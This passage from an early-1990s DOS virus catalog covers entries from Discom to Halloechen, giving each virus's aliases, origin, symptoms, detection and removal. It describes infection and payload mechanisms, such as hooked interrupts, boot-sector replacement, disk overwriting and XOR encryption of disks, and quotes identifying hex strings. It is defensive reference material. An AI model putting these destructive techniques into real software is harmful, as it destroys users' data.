virus will be located at the end of infected programs. Infected programs will not have their date and time altered by the virus. Systems infected with the Dir Virus will receive file allocation errors when the DOS ChkDsk program is executed on a drive containing infected programs. If the virus is not memory resident, these errors will not be found. Execution of the DOS ChkDsk program with the /F option when the virus is memory resident will result in corruption of the infected programs. This virus does not appear to contain any activation mechanism. Virus Name: Discom Aliases: V Status: New Discovered: November, 1990 Symptoms: TSR; .COM & .EXE growth Origin: Unknown Eff Length: 2,053 Bytes Type Code: PRsA - Parasitic Resident .COM & .EXE Infector Detection Method: Removal Instructions: Delete infected files General Comments: The Discom Virus was submitted in November, 1990. The location where the sample was isolated is unknown. Discom is a memory resident infector of .COM and .EXE files, and will not infect COMMAND.COM. This virus is based on the Jerusalem Virus, and also contains some code from the Sunday Virus. As such, some anti-viral utilities may identify files infected with this virus as containing both Jerusalem and Sunday. This virus does not exhibit symptoms or the activation of either the Jerusalem or Sunday viruses. The first time a program infected with the Discom Virus is executed, the virus will install itself memory resident as a 2,304 byte low system memory TSR. Interrupts 08 and 21 will be hooked by the virus. Once memory resident, the virus will infect .COM and .EXE files when they are executed. Infected .COM files will increase in length by 2,053 bytes and have the virus located at the beginning of the infected file. Infected .EXE files will increase in length by 2,059 to 2,068 bytes with the virus being located at the end of the file. All infected files will end with the following hex character string: 11121704D0. Unlike many Jerusalem Variants, this virus does not exhibit a system slowdown after being memory resident for 30 minutes, and no "black window" appears. Virus Name: Disk Killer Aliases: Computer Ogre, Disk Ogre, Ogre V Status: Common Discovered: April, 1989 Symptoms: Bad blocks, message, BSC, TSR, encryption of disk Origin: Taiwan Isolated: Milpitas, California, USA Eff Length: N/A Type Code: BRtT - Resident Boot Sector Infector Detection Method: ViruScan V39+, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: MDisk, CleanUp, Pro-Scan 1.4+, F-Prot, or DOS COPY & SYS General Comments: The Disk Killer virus is a boot sector infector that spreads by writing copies of itself to 3 blocks on either a floppy or hard disk. The virus does not care if these blocks are in use by another program or are part of a file. These blocks will then be marked as bad in the FAT so that they cannot be overwritten. The boot sector is patched so that when the system is booted, the virus code will be executed and it can attempt to infect any new disks exposed to the system. The virus keeps track of the elapsed disk usage time since initial infection, and does no harm until it has reached a predetermined limit. The predetermined limit is approximately 48 hours. (On most systems, Disk Killer will reach its limit within 1 - 6 weeks of its initial hard disk infection.) When the limit is reached or exceeded and the system is rebooted, a message is displayed identifying COMPUTER OGRE and a date of April 1. It then says to leave alone and proceeds to encrypt the disk by alternately XORing sectors with 0AAAAh and 05555h, effectively destroying the information on the disk. The only recourse after Disk Killer has activated and encrypted the entire disk is to reformat. The message text that is displayed upon activation, and can be found in the viral code is: "Disk Killer -- Version 1.00 by COMPUTER OGRE 04/01/89 Warning!! Don't turn off the power or remove the diskette while Disk Killer is Processing! PROCESSING Now you can turn off the power. I wish you Luck!" It is important to note that when the message is displayed, if the system is turned off immediately it may be possible to salvage some files on the disk using various utility programs as this virus first destroys the boot, FAT, and directory blocks. Disk Killer can be removed by using McAfee Associate's MDisk or CleanUp utility, or the DOS SYS command, to overwrite the boot sector on hard disks or bootable floppies. On non-system floppies, files can be copied to non-infected floppies, followed by reformatting the infected floppies. Be sure to reboot the system from a write protected master diskette before attempting to remove the virus first or you will be reinfected by the virus in memory. Note: Disk Killer may have damaged one or more files on the disk when it wrote a portion of its viral code to 3 blocks on the disk. Once the boot sector has been disinfected as indicated above, these corrupted files cannot reinfect the system, however they should be replaced with backup copies since the 3 blocks were overwritten. Note: Do not use the DOS DiskCopy program to backup infected diskettes as the new backup diskettes will contain the virus as well. Virus Name: Do-Nothing Virus Aliases: The Stupid Virus V Status: Extinct Discovered: October, 1989 Symptoms: .COM file growth, TSR (see text) Origin: Israel Eff Length: 608 Bytes Type Code: PRfC - Parasitic Resident .COM Infector Detection Method: ViruScan/X V67+, F-Prot, Pro-Scan, VirexPC, AVTK 3.5+ Removal Instructions: Scan/D/X, Pro-Scan 1.4+, or F-Prot General Comments: This virus was first reported by Yuval Tal of Israel in October, 1989. The virus will infect .COM files, but only the first one in the current directory, whether it was previously infected or not. The Do-Nothing virus is also memory resident, always installing itself to memory address 9800:100h, and can only infect systems with 640K of memory. The virus does not protect this area of memory in any way, and other programs which use this area will overwrite it in memory, removing the program from being memory resident. The Do-Nothing virus does no apparent damage, nor does it affect operation of the system in any observable way, thus its name. Also see: Saddam Virus Name: Dot Killer Aliases: 944, Point Killer V Status: Rare Discovered: October, 1990 Symptoms: .COM growth; removal of all dots (.) from display Origin: Koszalin, Poland Eff Length: 944 Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V72+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Dot Killer Virus was isolated in Koszalin, Poland in October, 1990. It is a non-resident infector of .COM files, including COMMAND.COM. When a program infected with the Dot Killer Virus is executed, the virus will infect one other .COM file in the current directory. Infected .COM files will increase in length by 944 bytes. The virus will be located at the end of infected files. While the Dot Killer Virus contains code to attempt to avoid infecting the program pointed to by the COMSPEC environmental parameter, this logic contains a bug and does not function properly. If COMMAND.COM, or the program pointed to by COMSPEC, is located in the current directory it will become infected just like any other .COM program. When the Dot Killer Virus activates, it will remove all dots (.) from the system display. Virus Name: EDV Aliases: Cursy, Stealth Virus V Status: Rare Discovered: 1988 Symptoms: BSC; partition table corruption; unusual system crashes Origin: France Eff Length: N/A Type Code: BRX - Resident Boot Sector/Partition Table Infector Detection Method: ViruScan V58+, IBM Scan, Pro-Scan 1.4+, VirHunt 2.0+ Removal Instructions: MDisk/P, CleanUp V67+, or Pro-Scan 1.4+ General Comments: The EDV, or Cursy, Virus was first discovered in Le Havre, France in 1988 by Jean-Luc Nail. At that time, it was named the Cursy Virus. Later, in January 1990, it was isolated separately and named the EDV virus. This virus is a memory resident infector of floppy diskette boot sectors and hard disk partition tables. When a system is booted from a diskette infected with the EDV virus, the virus will install itself memory resident at the top of high system memory. The value returned by interrupt 12 will be decreased. Once the virus is memory resident, and disk accessed by the system will become infected. When the virus infects a diskette, it moves the original boot sector to side 1, track 39, sector 8. After moving the original boot sector, it then copies the virus's code to absolute sector 0, the boot sector of the diskette. EDV will also infect hard disk drives when they are accessed. In the case of hard disks, the virus will move absolute sector 0 (the partition table) to side 1, track 39, sector 8 as though it were a 360K 5.25" floppy diskette. After moving the partition table, it will then overwrite the partition table with the viral code. Once the virus has infected six disks with the virus in memory, the EDV virus will activate. Upon activation, the virus access the keyboard interrupt to disable the keyboard and then will overwrite the first 3 tracks of each disk on the system, starting with the hard disks. After overwriting the disks, it will then display the following message: "That rings a bell, no? From Cursy" Upon activation, the user must power off the machine and reboot from a system diskette in order to regain any control over the machine. The following identification string appears at the very end of the boot sector on infected floppy disks and the partition table of infected hard drives, though it cannot be seen if the virus is in memory: "MSDOS Vers. E.D.V." Jean-Luc Nail has indicated that the EDV or Cursy virus is quiet common in the Le Havre area of France, although it is rare outside of France. Virus Name: Eight Tunes Aliases: 1971 V Status: Rare Discovered: April, 1990 Symptoms: file growth, music, decrease in available memory Origin: West Germany Eff Length: 1,971 Bytes Type Code: PRsA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V62+, Pro-Scan 1.4+, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: Scan/D, VirHunt 2.0+, or delete infected files General Comments: The Eight Tunes, or 1971, Virus was originally isolated in April 1990 by Fridrik Skulason of Iceland. This virus is a memory resident generic file infector of .COM, .EXE, and overlay files. The virus will not infect COMMAND.COM, or .COM files which are smaller than 8K. After the virus is memory resident, programs are infected as they are executed. Infected files will increase in length by between 1,971 - 1,985 bytes. Available memory will decrease by 1,984 bytes when the virus is present. This virus does not cause system damage, however it is disruptive. When the virus is memory resident, it will play 8 German folk songs at random intervals thirty minutes after the virus becomes memory resident. Virus Name: Evil Aliases: P1, V1701New V Status: Rare Discovered: July, 1990 Symptoms: .COM growth, system reboots, CHKDSK program failure, COMMAND.COM header change Origin: Bulgaria Eff Length: 1,701 Bytes Type Code: PRhCK - Parasitic Resident .COM Infector Detection Method: ViruScan V66+ Removal Instructions: Scan/D, or delete infected files General Comments: The Evil Virus is of Bulgarian origin, and was submitted to the author of this document in July, 1990 by Vesselin Bontchev. This virus is one of a family of three (3) viruses which may be referred to as the P1 or Phoenix Family. Each of these viruses is being documented separately due to their varying characteristics. The Evil virus is a memory resident, generic infector of .COM files, and will infect COMMAND.COM. It is the most advanced of the three viruses in the Phoenix Family. The Evil, or V1701New, Virus is a later version of the PhoenixD virus. The first time a program infected with the Evil virus is executed, the virus will install itself memory resident in free high memory, reserving 8,192 bytes. Interrupt 2A will be hooked by the virus. System total memory and free memory will decrease by 8,192 bytes. Evil will then check to see if the current drive's root directory contains a copy of COMMAND.COM. If a copy of COMMAND.COM is found, it will be infected by Evil by overwriting part of the binary zero portion of the program, and changing the program's header information. COMMAND.COM will not change in file length. The virus will then similarly infect COMMAND.COM residing in the C: drive root directory. After becoming memory resident, the virus will attempt to infect any .COM file executed. Evil is a better replicator than either the original Phoenix Virus or PhoenixD, and was successful in infecting .COM files in all cases on the author's system. Infected files will increase in size by 1,701 bytes. Evil is not able to recognize when it has previously infected a file, so it may reinfect .COM files several times. Each infection will result in another 1,701 bytes of viral code being appended to the file. Like PhoenixD, Evil will infect files when they are openned for any reason in addition to when they are executed. The simple act of copying a .COM file will result in both the source and target .COM files being infected. Systems infected with the Evil virus will experience problems with executing CHKDSK.COM. Attempts to execute this program with Evil memory resident will result in a warm reboot of the system occurring. The system, however, will not perform either a RAM memory check or request Date and Time if an autoexec.bat file is not present. This virus is not related to the Cascade (1701/1704) virus. The Evil Virus employs a complex encryption mechanism, and virus scanners which are only able to look for simple hex strings will not be able to detect it. There is no simple hex string in this virus that is common to all infected samples. Known variant(s) of Evil are: Evil-B : This is a earlier version of Evil, and is a rather poor replicator. It also has not to viable as infected programs will hang when they are executed, with the exception of the Runme.Exe file which the author received. The Runme.Exe file was probably the original release file distributed by the virus's author. (Originally listed in VSUM9008 as V1701New-B) Also see: Phoenix, PhoenixD Virus Name: F-Word Virus Aliases: Fuck You V Status: Rare Discovered: December, 1990 Symptoms: .COM growth; decrease in system and available free memory; file date/time changes Origin: USSR Eff Length: 417 Bytes Type Code: PRtCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The F-Word, or Fuck You, Virus was submitted in December, 1990 and is from the USSR. This virus is a memory resident infector of COM files, including COMMAND.COM. The first time a program infected with the F-Word Virus is executed the virus will install itself memory resident at the top of system memory but below the 640K DOS boundary. Interrupt 12's return will be moved. Total system memory and available free memory will decrease by 1,024 bytes. Interrupts 08 and 21 will be hooked by the virus. After F-Word is memory resident, it will infect COM files over approximately 2K in length when they are executed. Infected files will have a length increase of 417 bytes with the virus being located at the end of the program. The file's date and time in the directory will also have been changed to the system date and time when infection occurred. Attempts to executed the DOS Edlin program will result in a "Invalid drive of file name" message being displayed, and the program terminated. The text string "Fuck You!" can be found in all infected files. Virus Name: Father Christmas Aliases: Choinka V Status: Rare Discovered: November, 1990 Symptoms: .COM growth; lost cluster; cross-linking of files; graphic and message displayed on activation Origin: Poland Eff Length: 1,881 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V71+ Removal Instructions: Scan/D, or delete infected files General Comments: The Father Christmas, or Choinka, Virus was discovered in Poland in November, 1990. This virus is based on the Vienna Virus, and is a non-resident infector of .COM files, including COMMAND.COM. When a program infected with the Father Christmas Virus is executed, the virus will infect one other .COM file in the current directory. If no uninfected .COM files exist in the current directory, the virus will follow the system path to find an uninfected program. Infected files will increase in length by 1,881 bytes with the virus being located at the end of the infected program. Systems infected with the Father Christmas Virus may notice crosslinking of files and lost clusters. During the period from December 19 - December 31 of any year, this virus will activate. On these dates, when infected programs are executed a christmas trees graphic is displayed on the system monitor with the following message: Merry Christmas & a Happy New Year for all my lovely friends from FATHER CHRISTMAS If the graphic is displayed, the user must strike a key in order to have the program being executed finish running. Virus Name: Fellowship Aliases: 1022 V Status: Rare Discovered: July, 1990 Isolated: Australia Symptoms: TSR, .COM & .EXE file growth Origin: Malaysia Eff Length: 1,022 Bytes Type Code: PRsE - Parasitic Resident .EXE Infector Detection Method: ViruScan V66+, F-Prot 1.12+, Pro-Scan 2.01+ Removal Instructions: Scan/D, F-Prot 1.12+, or delete infected files General Comments: The Fellowship or 1022 Virus was isolated in Australia in July 1990. Fellowship is a memory resident generic infector of .EXE files. It does not infect .COM or overlay files. The first time a program infected with the Fellowship Virus is executed, the virus will install itself memory resident as a 2,048 byte TSR in low system memory. Available free memory will be decreased by a corresponding 2,048 bytes. Interrupt 21 will also now be controlled by the virus. After the virus is memory resident, the virus will infect .EXE files when they are executed. Infected .EXE files will increase in size by between 1,019 and 1,027 bytes. The virus's code will be located at the end of infected files. Infected files will contain the following text strings very close to the end of the file: "This message is dedicated to all fellow PC users on Earth Toward A Better Tomorrow And a better Place To Live In" "03/03/90 KV KL MAL" This virus is believed to have originated in Kuala Lumpur, Malaysia. Virus Name: Fish Virus Aliases: European Fish Viruses, Fish 6, Stealth Virus V Status: Rare Discovered: May 1990 Symptoms: .COM & .EXE growth, monitor/display flickering, system memory decrease Origin: West Germany Eff Length: 3,584 Bytes Type Code: PRsAK - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V63+, Pro-Scan 1.4+, VirexPC, F-Prot 1.12+, VirHunt 2.0+ Removal Instructions: Scan/D, CleanUp V66+, Pro-Scan 1.4+, VirHunt 2.0+, or delete infected files General Comments: The Fish Virus was isolated in May 1990. At the time of isolation, it was reported to be widespread in Europe, and it is thought to have originated in West Germany. It is a generic resident .COM and .EXE infector, and will infect COMMAND.COM. This virus will remain memory resident thru a warm reboot, or Ctrl-Alt-Del. The virus is encrypted, though infected programs can be found by searching for the text string "FISH FI" appearing near the end of the program. The "FISH FI" string may later disappear from the program. The first time a program infected with the Fish Virus is executed, the virus will go memory resident, installing itself into the low available free memory. If interrupt 13 has not been hooked by another program, it will hook interrupt 13. If it can hook interrupt 13, it will take up 8,192 bytes in memory. If the virus cannot hook interrupt 13 because another program is already using it, it will be 4,096 bytes in memory. When interrupt 13 is not hooked, and the virus is memory resident, the virus will cause a random warm reboot, thus allowing it to infect COMMAND.COM and hook interrupt 13. Warm reboots do not appear to randomly occur after interrupt 13 has been hooked. After the virus is memory resident, all .COM and .EXE programs which are openned for any reason will be infected. Infected programs increase in length by 3,584 bytes. The increase in program size cannot be seen by listing the disk directory if the virus is in memory. Also, if a CHKDSK command is run on an infected system, it will detect file allocation errors on infected files. If CHKDSK is run with the /F option, it will result in lost clusters and cross-linking of files. The virus slows down video writes, and flickering of the monitor display can be noticed on an infected system. Anti-viral programs which perform CRC checking cannot detect the infection of the program by the Fish Virus if the virus is memory resident. This virus can also bypass software write protect mechanisms used to protect a hard drive. The Fish Virus is a modified version of the 4096 Virus, though it is more sophisticated in that it constantly re-encrypts itself in system memory. Viewing system memory with the virus resident will show that the names of several fish are present. It is unknown what the Fish virus does when it activates, though it does appear to check to determine if the year of the system time is 1991. Virus Name: Flash Aliases: V Status: Rare Discovered: July 1990 Symptoms: .COM & .EXE growth, decrease in available free memory, video screen flicker Origin: West Germany Eff Length: 688 Bytes Type Code: PRfA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V64+, Pro-Scan 2.01+ Removal Instructions: Scan/D, Pro-Scan 2.01+, or Delete infected files General Comments: The Flash Virus was discovered in July 1990 in West Germany. Flash is a memory resident generic file infector, and will infect .COM and .EXE files, but not COMMAND.COM. The first time a program infected with the Flash Virus is executed, the virus will install itself memory resident. 976 bytes will be allocated in high memory, and available free memory will decrease by a corresponding 976 bytes. A mapping of memory will also indicate that when Flash is resident in memory, interrupts 00, 23, 24, 30, ED, F5, and FB are now in free memory. Total system memory reported by DOS, as well as low memory used by the operating system and TSRs will not have changed. Once Flash is memory resident, each time a .COM or .EXE program is executed it is a candidate for infection. An uninfected .EXE program will always be infected upon execution. Uninfected .COM files are only infected if they are greater than approximately 500 bytes in length. Infected files will always increase in length by 688 bytes. After June of 1990, systems with a graphics capable monitor may notice a screen flicker occurring at approximately seven minute intervals. The virus causes this effect by manipulating some screen blanking bits every seven minutes. Virus Name: Flip Aliases: V Status: Rare Discovered: July 1990 Symptoms: .COM & .EXE growth; decrease in system and free memory; boot sector and partition table altered; file allocation errors Origin: West Germany Eff Length: 2,343 Bytes Type Code: PRhABKX - Parasitic Resident .COM, .EXE, Partition Table Infector Detection Method: ViruScan V66+, F-Prot 1.12+, Pro-Scan 2.01+ Removal Instructions: Clean-Up V71+, Scan/D, or Delete infected files General Comments: The Flip Virus was discovered in West Germany in July 1990. It is a generic file infector, and will infect .COM, .EXE, and overlay files. This virus will also infect COMMAND.COM, as well as alter the partition table and boot sector of hard disks. It is important to note that the Flip virus is not infective from .COM files or boot sectors. The first time an EXE program infected with the Flip Virus is executed, it installs itself memory resident in high memory. System memory as reported by the CHKDSK command as well as free memory will have decreased by 3,064 bytes. At this time, the copy of COMMAND.COM located in the C: drive root directory will be infected, though no file length change will be apparent with the virus in memory. The system's hard disk partition table and boot sector will also be slightly modified. If the infected program was executed from a floppy, COMMAND.COM on the floppy will be infected, though the size change will be noticeable. After Flip becomes memory resident, any .COM or .EXE files executed will become infected. Infected programs will show a file length increase of 2,343 bytes. If a program is executed which uses an overlay file, the overlay file will also become infected. Systems infected Flip may experience file allocation errors resulting in file linkage errors. Some data files may become corrupted. On the second of any month, systems which were booted from an infected hard disk and have an EGA or VGA capable display adapter may experience the display on the system monitor being horizontally "flipped" between 16:00 and 16:59. Flip can only be passed between systems on infected .EXE files. Infected .COM files, and altered floppy boot sectors do not transfer the virus. Known variant(s) of Flip include: Flip B : Similar to the original Flip Virus, this variant has an effective length of 2,153 bytes. Its memory resident portion at the top of system memory is 2,672 bytes. The major difference between this variant and the original virus is that Flip B can infect programs from the hard disk partition table infection. Isolated: January, 1991. Origin: Unknown. Virus Name: FORM-Virus Aliases: Form, Form Boot V Status: Rare Discovered: June 1990 Symptoms: BSC, clicking noise from system speaker Origin: Switzerland Eff Length: N/A Type Code: BR - Resident Boot Sector Infector Detection Method: ViruScan V64+, F-Prot 1.12+, VirHunt 2.0+ Removal Instructions: MDisk, or DOS SYS command General Comments: The Form, or Form Boot, Virus is a memory resident infector of floppy and hard disk boot sectors. It was originally isolated in Switzerland. When a system is first booted with a diskette infected with the Form Boot virus, the virus will infect system memory as well as seek out and infect the system's hard disk. The floppy boot may or may not be successful, on the author's test system, a boot from floppy diskette infected with Form Boot never succeeded, instead the system would hang. It should be noted that the virus was received by the author of this document as a binary file, and it may have been damaged in some way. The following text message is contained in the Form Boot virus binary code as received by the author of this document: "The FORM-Virus sends greetings to everyone who's reading this text.FORM doesn't destroy data! Don't panic! Fuckings go to Corinne." These messages, however, may not appear in all cases. For example, I did not find these messages anywhere on a hard disk infected with Form Boot. Systems infected with the FORM-Virus in memory may notice that a clicking noise may be emitted from the system speaker on the 24th day of any month. This virus can be removed with the same technique as used with many boot sector infectors. First, power off the system and then boot from a known clean write-protected boot diskette. The DOS SYS command can then be used to recreate the boot sector. Alternately, MDisk from McAfee Associates may be used to recreate the boot sector. Virus Name: Frere Jacques Aliases: Frere Virus V Status: Rare Discovered: May 1990 Symptoms: .COM & .EXE growth, available memory decreases, system hangs, music (Frere Jacques) on Fridays Origin: California, USA Eff Length: 1,808 Bytes Type Code: PRA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V63+, Pro-Scan 1.4+, F-Prot 1.12+ Removal Instructions: Scan/D, Pro-Scan 1.4+, or Delete infected files General Comments: The Frere Jacques Virus was isolated in May, 1990. It is a memory resident generic file infector, infecting .COM, .EXE, and Overlay files. It does not infect COMMAND.COM. This virus is based on the Jerusalem B Virus. The first time an infected program is executed, the virus will install itself memory resident in low available free memory. The memory resident virus occupies 2,064 bytes, and attaches itself to interrupt 21. After becoming memory resident, Frere Jacques will infect any program which is then executed. Infected programs will increase in size by between 1,808 bytes and 1,819 bytes, though .COM files always increase in size by 1,813 bytes. Systems infected with Frere Jacques will experience a decrease in available free memory, as well as executable files increasing in size. System hangs will also intermittently occur when the virus attempts to infect programs, thus resulting in the possible loss of system data. On Fridays, the Frere Jacques virus activates, and will play the tune Frere Jacques on the system speaker. Also see: Jerusalem B Virus Name: Friday The 13th COM Virus Aliases: COM Virus, Miami, Munich, South African, 512 Virus V Status: Extinct Discovered: November, 1987 Symptoms: .COM growth, floppy disk access, file deletion Origin: Republic of South Africa Eff Length: 512 Bytes Type Code: PNC - Parasitic Non-Resident .COM Infector Detection Method: ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: Scan/D/X, Pro-Scan 1.4+, VirHunt 2.0+, or F-Prot General Comments: The original Friday The 13th COM virus first appeared in South Africa in 1987. Unlike the Jerusalem (Friday The 13th) viruses, it is not memory resident, nor does it hook any interrupts. This virus only infects .COM files, but not COMMAND.COM. On each execution of an infected file, the virus looks for two other .COM files on the C drive and 1 on the A drive, if found they are infected. This virus is extremely fast, and the only indication of propagation occurring is the access light being on for the A drive, if the current default drive is C. The virus will only infect a .COM file once. The files, after infection, must be less than 64K in length. On every Friday the 13th, if the host program is executed, it is deleted. Known variants of the Friday The 13th COM virus are: Friday The 13th-B: same, except that it will infect every file in the current subdirectory or in the system path if the infected .COM program is in the system path. Friday The 13th-C: same as Friday The 13th-B, except that the message "We hope we haven't inconvenienced you" is displayed whenever the virus activates. Author's note: All samples of this virus that are available were created by reassembling a disassembly of this virus. These viruses may not actually exist "in the wild". Virus Name: Fu Manchu Aliases: 2080, 2086 V Status: Rare Discovered: March, 1988 Symptoms: .SYS, .BIN, .COM & .EXE growth, messages Origin: Eff Length: 2,086 (COM files) & 2,080 (EXE files) bytes Type Code: PRsA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: Scan/D, F-Prot, Pro-Scan 1.4+, VirHunt 2.0+, VirexPC General Comments: The Fu Manchu virus attaches itself to the beginning of .COM files or the end of .EXE files. This virus will infect any executable program, including overlay, .SYS, and .BIN files as well. It appears to be a rewritten version of the Jerusalem virus, with a possible creation date of 3/10/88. A marker or id string usually found in this virus is 'sAXrEMHOr', though the virus only uses the 'rEMHOr' portion of the string to identify infected files. One out of sixteen infections will result in a timer being installed, and after a random amount of time, the message "The world will hear from me again!" is displayed and the system reboots. This message will also be displayed on an infected system after a warm reboot, though the virus doesn't survive in memory. After August 1, 1989, the virus will monitor the keyboard buffer, and will add derogatory comments to the names of various politicians. These comments go to the keyboard buffer, so their effect is not limited to the display. The messages within the virus are encrypted. This virus is very rare in the United States. Also see: Jerusalem B, Taiwan 3 Virus Name: Ghostballs Aliases: Ghost Boot, Ghost COM V Status: Extinct Discovered: October, 1989 Symptoms: moving graphic display, .COM file growth, file corruption, BSC. Origin: Iceland Eff Length: 2,351 bytes Type Code: PNCB - Parasitic Non-Resident .COM & Boot Sector Infector Detection Method: ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: MDisk or DOS SYS and erase infected .COM files, or CleanUp, F-Prot, Pro-Scan 1.4+, VirexPC, Scan/D/X, VirHunt 2.0+ General Comments: The Ghostball virus (Ghost Boot and Ghost COM) were discovered in October, 1989 by Fridrik Skulason of Iceland. The Ghostballs Virus virus infects generic .COM files, increasing the file size by 2,351 bytes. It also alters the disk boot sector, replacing it with viral code similar to the Ping Pong virus. This altered boot sector, however, will not replicate. Symptoms of this virus are very similar to the Ping Pong virus, and random file corruption may occur on infected systems. The Ghostballs virus was the first known virus that could infect both files (.COM files in this case) and disk boot sectors. After the boot sector is infected, the system experiences the bouncing ball effect of the Ping Pong virus. If the boot sector is overwritten to remove the boot viral infection, it will again become corrupted the next time an infected .COM file is executed. The Ghostballs Virus is based on the code of two other viruses. The .COM infector portion consists of a modified version of the Vienna virus. The boot sector portion of the virus is based on the Ping Pong virus. To remove this virus, turn off the computer and reboot from a write protected master diskette for the system. Then use either MDisk or the DOS SYS command to replace the boot sector on the infected disk. Any infected .COM files must also be erased and deleted, then replaced with clean copies from your original distribution diskettes. Virus Name: Golden Gate Aliases: Mazatlan, 500 Virus V Status: Extinct Discovered: 1988 Symptoms: BSC, disk format, Resident TOM Origin: California, USA Eff Length: N/A Type Code: BRt - Resident Boot Sector Infector Detection Method: ViruScan (identifies as Alameda) Removal Instructions: MDisk, F-Prot, or DOS SYS command General Comments: The Golden Gate virus is a modified version of the Alameda virus which activates when the counter in the virus has determined that it is infected 500 diskettes. The virus replicates when a CTL-ALT-DEL is performed, infecting any diskette in the floppy drive. Upon activation, the C: drive is formatted. The counter in the virus is reset on each new floppy or hard drive infected. Known Variants of this virus are: Golden Gate-B: same as Golden Gate, except that the counter has been changed from 500 to 30 infections before activation, and only diskettes are infected. Golden Gate-C: same as Golden Gate-B, except that the hard drive can also be infected. This variant is also known as the Mazatlan Virus, and is the most dangerous of the Golden Gate viruses. Also see: Alameda Virus Name: Grither Aliases: V Status: New Discovered: January, 1991 Symptoms: .COM growth; C: & D: drive disk corruption Origin: United States Eff Length: 774 Bytes Type Code: PNCK - Parasitic Non-Resident .COM & .EXE Infector Detection Method: ViruScan V72+ Removal Instructions: Scan/D, Delete infected files General Comments: The Grither Virus was submitted in January, 1991, by Paul Ferguson of the United States. This virus is a non-resident direct action infector of .COM files, including COMMAND.COM. When a program infected with Grither is executed, the virus will infect one .COM file in the current directory. COMMAND.COM may become infected if it exists in the current directory. .COM programs infected with Grither will increase in length by 774 bytes, the virus will be located at the end of the infected file. The file's date and time in the disk directory will not be altered by the virus. The Grither Virus can be extremely destructive. With a probability of approximately one out of every eight times an infected program is executed, the virus may activate. On activation, Grither will overwrite the beginning of the C: and D: drives of the system's hard disk. Effectively, this corrupts the disk's boot sector, file allocation tables, and directory, as well as the system files. Grither is roughly based on the Vienna and Violator viruses. ViruScan V72 will identify Grither infected files as Vienna B, though it may also identify them as Violator in rare circumstances. Virus Name: Groen Links Aliases: Green Left V Status: Rare Discovered: March, 1990 Symptoms: .COM & .EXE growth; TSR; Music Origin: Amsterdam, Holland Eff Length: 1,888 Bytes Type Code: PRsA - Resident Parasitic .COM &.EXE Infector Detection Method: ViruScan V67+, Pro-Scan 2.01+ Removal Instructions: Scan/D, Pro-Scan 2.01+, or Delete infected files General Comments: The Groen Links Virus was originally reported in Amsterdam, Holland, in March 1990. This virus is a memory resident infector of .COM and .EXE files. It does not infect COMMAND.COM. It is a variant of the Jerusalem B virus, though is listed separately here as it is a different length and exhibits different characteristics. The first time a program infected with the Groen Links Virus is executed, the virus will install itself memory resident as a low system memory TSR of 1,872 bytes. Interrupts 21 and CE will be hooked by the virus. After the virus is memory resident, it will infect .COM and .EXE files as they are executed. Infected .COM files will increase in length by 1,893 bytes with the virus being located at the beginning of the file. .EXE files will increase in length by 1,888 to 1,902 bytes with the virus located at the end of infected files. As with many of the Jerusalem variants, this virus will reinfect .EXE files. After the first infection, .EXE files will increase by 1,888 bytes on subsequent infections. Infected files will contain the text string: "GRLKDOS". After the virus has been resident for 30 minutes, it may play "Stem op Groen Links" every 30 minutes. The name of the tune translates to "Vote Green Left", Green Left being a political party in Holland. Virus Name: Guppy Aliases: V Status: Rare Discovered: October, 1990 Symptoms: TSR, .COM growth, error messages, disk boot failures Origin: United States Eff Length: 152 Bytes Type Code: PRsCK - Resident Parasitic .COM &.EXE Infector Detection Method: Pro-Scan 2.01+ Removal Instructions: Pro-Scan 2.01+, or Delete infected files General Comments: The Guppy Virus was submitted in late October, 1990 by Paul Ferguson of Washington, DC. Guppy is a memory resident infector of .COM files, including COMMAND.COM. The first time a program infected with the Guppy Virus is executed, the virus will install itself memory resident as a low system memory TSR with interrupt 21 hooked. Available free memory will decrease by 720 bytes. After the virus is memory resident, any .COM file with a file length of at least 100 bytes (approximately) that is executed will become infected with Guppy. Infected files will increase in length by 152 bytes, with two bytes added to the beginning of the .COM file, and 150 bytes added to the end of the file. Infected files will also have their date/time stamps in the directory updated to the system date and time when the infection occurred. If COMMAND.COM is executed with Guppy memory resident, it will become infected. If the system is later booted from a disk with a Guppy infected COMMAND.COM, the boot will fail and a "Bad or Missing Command Interpreter" message will be displayed. Some programs will also fail to execute properly once infected with Guppy. For example, attempts to execute EDLIN.COM after it was executed on my system resulted in a consistent "Invalid drive or file name" message, and EDLIN ending execution. Infected files can be identified as they will end with the following hex character string: 3ECD211F5A5B58EA Virus Name: Halloechen Aliases: V Status: Rare Discovered: October, 1989 Symptoms: TSR, .COM & .EXE growth, garbled keyboard input. Origin: West Germany Eff Length: 2,011 Bytes Type Code: PRsA - Resident Parasitic .COM &.EXE Infector Detection Method: ViruScan V57+, Pro-Scan 1.4+, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: VirHunt 2.0+, Scan/D or delete infected files General Comments: The Halloechen virus was reported by Christoff Fischer of the University of Karlsruhe in West Germany. The virus is a memory resident generic .COM & .EXE file infector which is reported to be widespread in West Germany. The Halloechen virus installs itself memory resident when the first infected program is executed. Thereafter, the virus will infect any .EXE or .COM file which is run unless the resulting infected file would be greater than 64K in size, or the file's date falls within the system date's current month and year. Once a file has been determined to be a candidate for infection, and is less than approximately 62K in size as well as having a date outside of the current month and year, it is infected. In the process of infecting the file, the files size is first increased so that it is a multiple of 16 (ends on a paragraph boundary), then the 2,011 bytes of viral code are added. When infected files are run, input from the keyboard is garbled. Virus Name: Happy New Year Aliases: Happy N.Y., V1600 V 